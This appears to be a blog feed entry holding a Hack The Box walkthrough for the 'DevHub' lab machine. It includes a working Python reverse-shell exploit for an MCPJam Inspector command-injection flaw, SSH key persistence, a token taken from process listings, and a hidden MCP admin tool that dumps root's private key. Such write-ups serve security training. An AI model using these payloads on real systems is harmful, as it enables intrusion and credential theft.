https://zylonic.space/categories/ctf/ Recent content in CTF on Zylonic Hugo -- gohugo.io en Tue, 02 Jun 2026 16:50:26 +0530 https://zylonic.space/htb-devhub-walkthrough/ Tue, 02 Jun 2026 16:50:26 +0530 https://zylonic.space/htb-devhub-walkthrough/ <h2 id="machine-info">Machine Info </h2><table> <thead> <tr> <th>Field</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td>Name</td> <td>DevHub</td> </tr> <tr> <td>OS</td> <td>Linux (Ubuntu 22.04.5)</td> </tr> <tr> <td>Difficulty</td> <td>Medium</td> </tr> </tbody> </table> <hr> <h2 id="enumeration">Enumeration </h2><h3 id="nmap-scan">Nmap Scan </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap -sC -sV -p- 10.129.59.202 </span></span></code></pre></div><table> <thead> <tr> <th>Port</th> <th>Service</th> </tr> </thead> <tbody> <tr> <td>22</td> <td>SSH</td> </tr> <tr> <td>80</td> <td>HTTP (nginx)</td> </tr> <tr> <td>6274</td> <td>Node.js (MCPJam Inspector)</td> </tr> </tbody> </table> <h3 id="port-6274---mcpjam-inspector">Port 6274 - MCPJam Inspector </h3><p>Port 6274 runs <code>@mcpjam/inspector@1.4.2</code>, a Node.js implementation of the Model Context Protocol. A quick search turns up <a class="link" href="https://github.com/advisories/GHSA-232v-j27c-5pp6" target="_blank" rel="noopener" >CVE-2026-23744</a> — The inspector binds to <code>0.0.0.0</code> by default and the <code>/api/mcp/connect</code> endpoint takes <code>command</code> and <code>args</code> from the request body with zero validation, passing them straight to a child process. No auth required. Patched in 1.4.3, but this box is running 1.4.2.</p> <hr> <h2 id="initial-foothold---mcp-dev">Initial Foothold - <code>mcp-dev</code> </h2><h3 id="exploitation">Exploitation </h3><p>Poking at the MCPJam Inspector API, there&rsquo;s a <code>/api/mcp/connect</code> endpoint that accepts a <code>serverConfig</code> object. The idea is that you&rsquo;re telling it how to spawn an MCP server - but there&rsquo;s no validation on the command. So we just&hellip; give it a reverse shell.</p> <p>Set up a listener:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nc -lvnp <span class="m">4444</span> </span></span></code></pre></div><p>Then fire the exploit:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">requests</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">time</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">target</span> <span class="o">=</span> <span class="s2">&#34;http://10.129.59.202:6274&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">ip</span> <span class="o">=</span> <span class="s2">&#34;10.10.16.157&#34;</span> <span class="c1"># your HTB tun0 IP - change this to match yours</span> </span></span><span class="line"><span class="cl"><span class="n">port</span> <span class="o">=</span> <span class="s2">&#34;4444&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">url</span> <span class="o">=</span> <span class="sa">f</span><span class="s1">&#39;</span><span class="si">{</span><span class="n">target</span><span class="si">}</span><span class="s1">/api/mcp/connect&#39;</span> </span></span><span class="line"><span class="cl"><span class="n">data</span> <span class="o">=</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;serverConfig&#34;</span><span class="p">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;command&#34;</span><span class="p">:</span> <span class="s2">&#34;python3&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;args&#34;</span><span class="p">:</span> <span class="p">[</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;-c&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="sa">f</span><span class="s2">&#34;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&#39;</span><span class="si">{</span><span class="n">ip</span><span class="si">}</span><span class="s2">&#39;,</span><span class="si">{</span><span class="n">port</span><span class="si">}</span><span class="s2">));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([&#39;/bin/bash&#39;,&#39;-i&#39;])&#34;</span> </span></span><span class="line"><span class="cl"> <span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;env&#34;</span><span class="p">:</span> <span class="p">{}</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;serverId&#34;</span><span class="p">:</span> <span class="s2">&#34;pwned&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[*] Sending reverse shell payload...&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">response</span> <span class="o">=</span> <span class="n">requests</span><span class="o">.</span><span class="n">post</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="n">data</span><span class="p">,</span> <span class="n">verify</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Status: </span><span class="si">{</span><span class="n">response</span><span class="o">.</span><span class="n">status_code</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Response: </span><span class="si">{</span><span class="n">response</span><span class="o">.</span><span class="n">text</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="s2">&#34;[*] Check your listener - press Ctrl+C to exit&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="kc">True</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">except</span> <span class="ne">KeyboardInterrupt</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">&#34;</span><span class="se">\n</span><span class="s2">[*] Exiting...&#34;</span><span class="p">)</span> </span></span></code></pre></div><p>Shell lands as <code>mcp-dev</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">mcp-dev@devhub:~$ </span></span></code></pre></div><h3 id="capabilities-check">Capabilities Check </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">getcap -r / 2&gt;/dev/null </span></span></code></pre></div><p>Checked for any binaries with elevated capabilities - nothing came back. Moving on.</p> <h3 id="whats-running">What&rsquo;s Running? </h3><p>Now that we&rsquo;re on the box, <code>ps aux</code> is the next thing to check. The full process list is visible across all users, and there are two interesting entries:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">analyst 1078 jupyter-lab --ip=127.0.0.1 --port=8888 </span></span><span class="line"><span class="cl"> --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 </span></span><span class="line"><span class="cl"> --notebook-dir=/home/analyst/notebooks </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root 1084 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py </span></span></code></pre></div><p>Two things worth noting here - sit with them for a moment before reading on.</p> <p>The Jupyter token is sitting in plain text in the process arguments. And root is running something out of analyst&rsquo;s home directory. Both of those are going to matter.</p> <h3 id="getting-ssh-access-for-tunneling">Getting SSH Access for Tunneling </h3><p>Jupyter is bound to <code>127.0.0.1:8888</code> - not reachable directly. We need an SSH tunnel, which means getting SSH access as <code>mcp-dev</code> first. No <code>.ssh</code> directory exists yet, so we create one and drop in our public key:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">mkdir -p ~/.ssh </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... attacker@machine&#34;</span> &gt;&gt; ~/.ssh/authorized_keys <span class="c1"># use your public id here.</span> </span></span><span class="line"><span class="cl">chmod <span class="m">600</span> ~/.ssh/authorized_keys </span></span></code></pre></div><p>Then from the attacker machine, forward the port:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ssh -L 8888:127.0.0.1:8888 mcp-dev@10.129.59.202 </span></span></code></pre></div><hr> <h2 id="lateral-movement---analyst">Lateral Movement - <code>analyst</code> </h2><h3 id="jupyter-lab">Jupyter Lab </h3><p>With the tunnel up, open <code>http://localhost:8888</code> in a browser. It asks for a token or a password - we already have the token from <code>ps aux</code>:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 </span></span></code></pre></div><p>We&rsquo;re in. Open a terminal from within Jupyter Lab:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">analyst@devhub:~$ whoami </span></span><span class="line"><span class="cl">analyst </span></span></code></pre></div><p>User flag is in the home dir.</p> <h3 id="reading-the-opsmcp-server">Reading the OPSMCP Server </h3><p>Remember that root process running <code>server.py</code> out of analyst&rsquo;s directory? The file is readable:</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat /opt/opsmcp/server.py </span></span></code></pre></div><p>Reading through it reveals:</p> <ul> <li>An API key hardcoded in the source</li> <li>A <code>/tools/list</code> endpoint that only returns <em>some</em> tools</li> <li>A <code>/tools/call</code> endpoint that accepts <em>all</em> tools - including ones not listed</li> </ul> <p>The server is on <code>127.0.0.1:5000</code>.</p> <hr> <h2 id="privilege-escalation---root">Privilege Escalation - <code>root</code> </h2><h3 id="mapping-the-api">Mapping the API </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -H <span class="s2">&#34;X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a&#34;</span> http://127.0.0.1:5000/ </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;endpoints&#34;</span><span class="p">:</span> <span class="p">[</span><span class="s2">&#34;/tools/list&#34;</span><span class="p">,</span> <span class="s2">&#34;/tools/call&#34;</span><span class="p">,</span> <span class="s2">&#34;/health&#34;</span><span class="p">],</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;server&#34;</span><span class="p">:</span> <span class="s2">&#34;OPSMCP&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;status&#34;</span><span class="p">:</span> <span class="s2">&#34;operational&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -H <span class="s2">&#34;X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a&#34;</span> http://127.0.0.1:5000/tools/list </span></span></code></pre></div><p>Four tools come back. But from reading <code>server.py</code>, we know there&rsquo;s a fifth one that isn&rsquo;t listed - <code>ops._admin_dump</code>. It takes a <code>target</code> argument and a <code>confirm</code> boolean.</p> <h3 id="calling-the-hidden-tool">Calling the Hidden Tool </h3><p>The exact parameter names matter here - <code>name</code> and <code>arguments</code>.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">curl -X POST <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span> -H <span class="s2">&#34;X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span> -H <span class="s2">&#34;Content-Type: application/json&#34;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span> -d <span class="s1">&#39;{&#34;name&#34;:&#34;ops._admin_dump&#34;,&#34;arguments&#34;:{&#34;target&#34;:&#34;ssh_keys&#34;,&#34;confirm&#34;:true}}&#39;</span> <span class="se">\ </span></span></span><span class="line"><span class="cl"><span class="se"></span> http://127.0.0.1:5000/tools/call </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;target&#34;</span><span class="p">:</span> <span class="s2">&#34;ssh_keys&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;root_private_key&#34;</span><span class="p">:</span> <span class="s2">&#34;-----BEGIN OPENSSH PRIVATE KEY-----\n...&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nt">&#34;note&#34;</span><span class="p">:</span> <span class="s2">&#34;Emergency recovery key dump&#34;</span> </span></span><span class="line"><span class="cl"><span class="p">}</span> </span></span></code></pre></div><h3 id="root-shell">Root Shell </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;-----BEGIN OPENSSH PRIVATE KEY-----...&#34;</span> &gt; root_key </span></span><span class="line"><span class="cl">chmod <span class="m">600</span> root_key </span></span><span class="line"><span class="cl">ssh -i root_key root@10.129.59.202 </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">root@devhub:~# id </span></span><span class="line"><span class="cl">uid=0(root) gid=0(root) groups=0(root) </span></span></code></pre></div><hr> <h2 id="the-chain">The Chain </h2><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">MCPJam</span> <span class="n">RCE</span> <span class="p">(</span><span class="n">port</span> <span class="mi">6274</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">mcp</span><span class="o">-</span><span class="n">dev</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">Jupyter</span> <span class="n">token</span> <span class="ow">in</span> <span class="n">ps</span> <span class="n">aux</span> <span class="err">→</span> <span class="n">SSH</span> <span class="n">tunnel</span> <span class="err">→</span> <span class="n">Jupyter</span> <span class="n">web</span> <span class="n">interface</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">analyst</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">OPSMCP</span> <span class="n">API</span> <span class="n">key</span> <span class="ow">in</span> <span class="n">server</span><span class="o">.</span><span class="n">py</span> <span class="err">→</span> <span class="n">hidden</span> <span class="n">ops</span><span class="o">.</span><span class="n">_admin_dump</span> <span class="k">tool</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">Root</span> <span class="n">SSH</span> <span class="n">private</span> <span class="n">key</span> </span></span><span class="line"><span class="cl"> <span class="err">↓</span> </span></span><span class="line"><span class="cl"><span class="n">root</span> </span></span></code></pre></div>